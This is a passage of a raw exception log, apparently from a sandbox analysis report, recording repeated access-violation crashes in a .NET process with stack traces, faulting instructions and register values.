0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007668
registers.edi: 3007968
registers.eax: 0
registers.ebp: 3007980
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d814ec
0x4d80d82
0x4d80c6d
0x65f2d3
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007956
registers.edi: 3008300
registers.eax: 0
registers.ebp: 3007964
registers.edx: 0
registers.ebx: 3010924
registers.esi: 46347724
registers.ecx: 46584944
1 0 0

__exception__

stacktrace:
0x4d85a08
0x4d85859
0x4d80c55
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007644
registers.edi: 3007944
registers.eax: 0
registers.ebp: 3007956
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d85f9e
0x4d85859
0x4d80c55
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007932
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007940
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 48019816
1 0 0

__exception__

stacktrace:
0x4d85a08
0x4d85859
0x4d80c6d
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007644
registers.edi: 3007944
registers.eax: 0
registers.ebp: 3007956
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d85f9e
0x4d85859
0x4d80c6d
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007932
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007940
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 49611656
1 0 0

__exception__

stacktrace:
0x4d85a08
0x4d85859
0x4d80c6d
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007644
registers.edi: 3007944
registers.eax: 0
registers.ebp: 3007956
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d85f9e
0x4d85859
0x4d80c6d
0x65f5bc
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007932
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007940
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 50961344
1 0 0

__exception__

stacktrace:
0x4d86342
0x4d86151
0x4d80c55
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007696
registers.edi: 3007996
registers.eax: 0
registers.ebp: 3008008
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d867aa
0x4d86151
0x4d80c55
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007984
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007992
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45575512
registers.ecx: 45811456
1 0 0

__exception__

stacktrace:
0x4d86342
0x4d86151
0x4d80c6d
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007696
registers.edi: 3007996
registers.eax: 0
registers.ebp: 3008008
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d867aa
0x4d86151
0x4d80c6d
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007984
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007992
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 47302252
1 0 0

__exception__

stacktrace:
0x4d86342
0x4d86151
0x4d80c6d
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
exception.instruction: cmp dword ptr [ecx], ecx
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d81b62
registers.esp: 3007696
registers.edi: 3007996
registers.eax: 0
registers.ebp: 3008008
registers.edx: 14846584
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 0
1 0 0

__exception__

stacktrace:
0x4d85490
0x4d867aa
0x4d86151
0x4d80c6d
0x65f6d4
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0x4d854d3
registers.esp: 3007984
registers.edi: 3008324
registers.eax: 0
registers.ebp: 3007992
registers.edx: 0
registers.ebx: 3010924
registers.esi: 45573776
registers.ecx: 48792760
1 0 0

__exception__

stacktrace:
0x4d86c1c
0x4d86a39
0x4d80c55
0x65f7da
0x65e469
0x65d9ff
0x657855
0x656f0b
0x653c6b
0x6535d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72592652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x725a264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x725a2e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x726574ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72657610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x726e1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x726e1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x726e1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x726e416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72c3f5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72cf7f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72cf4de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 39 09 ff 15 94 8c e2 00 89 85 04 ff ff ff 8b 85
